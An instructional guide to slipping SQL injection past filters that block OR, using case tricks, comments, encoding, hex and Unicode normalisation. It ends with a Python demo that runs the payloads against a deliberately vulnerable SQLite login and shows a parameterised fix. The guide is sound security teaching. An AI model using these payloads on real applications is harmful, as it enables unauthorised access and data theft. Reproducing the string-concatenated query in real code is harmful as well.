
OR SQL Injection Bypass

TL;DR

Many web applications try to prevent SQL injection by filtering the OR keyword out of user input. This guide shows the common ways such a filter is bypassed, including alternative syntax, comments, URL and double encoding, and Unicode normalisation, and notes where each trick is specific to one database.

Bypassing OR SQLi Filters: A Step-by-Step Guide

  1. Understand the Problem

    Web applications often block OR to prevent attackers from combining multiple conditions in a way that always evaluates to true. For example, if an application filters OR, a simple attack like ' OR '1'='1 will fail.

  2. Alternative Syntax

    Try different ways to write the OR condition:

    • Using ||: MySQL (in its default sql_mode) treats || as logical OR, so ' || '1'='1 works there. In PostgreSQL, SQLite and Oracle, || is string concatenation and the payload only builds a string to compare, and SQL Server does not accept || at all, so identify the back end before relying on it.
    • Rewriting the condition with AND NOT: De Morgan's law gives A OR B as NOT (NOT A AND NOT B). Beware that A AND NOT (NOT B) simplifies to A AND B, which does not widen the result set. Because the outer NOT has to precede the application's own predicate, this form only helps where you control the whole expression, for instance inside a subquery or a UNION branch.
    • Using UNION SELECT: not a bypass of the OR filter itself, but if you can identify the column count and data types, a UNION attack returns other rows without needing OR.
  3. Case Sensitivity Bypass

    Some filters are case-sensitive, while SQL keywords are not, so the database accepts any capitalisation:

    • ' OR '1'='1 (the form the filter blocks)
    • ' oR '1'='1
    • ' Or '1'='1
  4. Whitespace and Comments

    Changing the whitespace around the keyword or wrapping it in comments can sometimes bypass filters:

    • Whitespace: replace the spaces around OR with other separators the SQL parser accepts, such as a tab or newline (%09 or %0a in a URL) or an empty comment: '/**/OR/**/'1'='1. This only helps against a filter that matches " OR " with surrounding spaces rather than the bare keyword.
    • Comments (MySQL): ' /*!OR*/ '1'='1. MySQL executes the contents of a /*! ... */ comment while every other database treats it as an ordinary comment; with a version number, /*!50000OR*/, only MySQL 5.0.0 and later executes it. A filter or WAF that strips comments before matching sees no OR, but MySQL still runs it.
    • Comments (--, supported by MySQL, SQL Server and PostgreSQL; MySQL also accepts #): a comment does not hide OR, it removes the need for it. admin'-- terminates the statement after the username check, so ... WHERE username = 'admin'--' AND password = '...' never evaluates the password predicate. Note that ' -- OR '1'='1 comments out the injected condition itself and does nothing.
  5. Encoding (URL Encoding)

    If the filter inspects the raw query string rather than the decoded parameter, encode the keyword; the web server or framework decodes it once before the query is built:

    • Encode the keyword: %4f%52 is OR, so the full payload ' OR '1'='1 becomes %27%20%4f%52%20%271%27%3D%271.
    • Encode a single character: ' %4fR '1'='1 also reads as ' OR '1'='1 after one decode.
    Most frameworks hand the application the already decoded value, so a filter that runs on that value still sees OR; single encoding then achieves nothing and double encoding is needed.
  6. Double Encoding

    Sometimes the application decodes the input a second time after the filter has run, for example when the framework has already decoded the query string and the application calls a decode routine again. Double encoding then passes the filter in encoded form and reaches the query as OR:

    • Encode OR to %4f%52, then encode the % signs again: %254f%2552. After the first decode the filter sees %4f%52; after the second, the query sees OR.
  7. Using Hex Encoding

    MySQL accepts hexadecimal literals in place of quoted strings:

    • 0x61646d696e is the string 'admin', so username = 0x61646d696e works without any quote character. A hex literal is a value, not syntax: 0x4f52 is the two-byte string 'OR', not the OR operator, and ' AND 0x4f52 '1'='1 is a syntax error. Use hex literals to get past quote filters or to feed string values into a UNION or comment-based payload, not to smuggle keywords.
  8. Character Substitution

    Look-alike characters only help when the application normalises the input after the filter has run:

    • Unicode equivalents: the fullwidth letters ＯＲ (U+FF2F U+FF32) pass a filter that looks for ASCII OR and become OR under NFKC normalisation. Sent to the database unnormalised they are a syntax error, because no database parses them as the keyword, so first test whether the application normalises at all.
  9. Exploit Example (MySQL)
    SELECT * FROM users WHERE username = 'admin' OR 1=1;

    If the filter blocks OR, the same predicate without the keyword is

    SELECT * FROM users WHERE NOT (NOT username = 'admin' AND NOT 1=1);

    Note that username = 'admin' AND NOT (NOT 1=1) is just username = 'admin' AND 1=1 and returns only the admin row. The NOT has to wrap the whole predicate, so this rewrite needs control of the start of the WHERE clause; from an injected username value the comment trick (admin'--) or, on MySQL, || are the usual OR-less routes.
  10. Important Considerations
    • Database Type: The best bypass technique depends on the specific database system being used.
    • Filter Complexity: Some filters are more sophisticated and may require more creative bypasses.
    • Error Messages: Pay attention to error messages, as they can provide clues about how the filter is working.
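The following is an added example, not code from the original article: a naive OR filter sitting in front of a string-built login query, exercised with the bypasses above against an in-memory SQLite database. The users table, the credentials and the payloads are constructed for the demonstration, and two common application bugs are assumed: the parameter is URL-decoded a second time after the filter has run, and it is NFKC-normalised after the filter has run. The /*!OR*/ trick is not exercised because SQLite has no MySQL-style versioned comments, and || is concatenation in SQLite, which the pipes payload shows.

```python
import sqlite3
import unicodedata
from urllib.parse import unquote

BLOCKED_KEYWORDS = ("OR",)   # the naive filter: case-sensitive substring match


def naive_filter_rejects(value: str) -> bool:
    """The filter under test: rejects input containing the literal text OR."""
    return any(word in value for word in BLOCKED_KEYWORDS)


def canonicalise(value: str) -> str:
    """Assumed application bug: a second URL-decode and NFKC normalisation,
    both applied only after the filter has already run."""
    return unicodedata.normalize("NFKC", unquote(value))


def setup_db() -> sqlite3.Connection:
    """Constructed sample data for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Returns (status, matched usernames). `username` is the parameter as a
    typical framework hands it over, i.e. already URL-decoded once."""
    if naive_filter_rejects(username):
        return "blocked", []
    u = canonicalise(username)
    # Vulnerable on purpose: user input is concatenated into the query text.
    sql = f"SELECT username FROM users WHERE username = '{u}' AND password = '{password}'"
    try:
        return "ok", [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return f"error: {exc}", []


def login_safe(conn, username, password):
    """The fix: a parameterised query, which makes the keyword filter unnecessary."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return "ok", [row[0] for row in conn.execute(sql, (username, password))]


# Constructed payloads, each submitted as the username together with a wrong password.
PAYLOADS = {
    "plain":      "' OR '1'='1'--",            # step 1: caught by the filter
    "case":       "' oR '1'='1'--",            # step 3: SQL keywords are case-insensitive
    "pipes":      "' || '1'='1'--",            # step 2: || is concatenation in SQLite, no bypass
    "comment":    "admin'--",                  # step 4: no OR needed at all
    "double_enc": "' %4f%52 '1'='1'--",        # step 6: second decode runs after the filter
    "fullwidth":  "' \uff2f\uff32 '1'='1'--",  # step 8: NFKC turns fullwidth OR into OR after the filter
}


def run_all():
    """Runs every payload through the vulnerable login; returns {name: (status, rows)}."""
    conn = setup_db()
    return {name: login_vulnerable(conn, payload, "wrong") for name, payload in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (status, rows) in run_all().items():
        print(f"{name:10s} {status:8s} {rows}")
    print(f"{'safe':10s}", login_safe(setup_db(), PAYLOADS["case"], "wrong"))
```

Run it and only the plain payload is blocked; the case, double-encoded and fullwidth variants all log in as every user, the comment payload logs in as admin without any OR, and the || payload returns nothing on SQLite. The parameterised login_safe returns no rows for all of them, which is the check that matters.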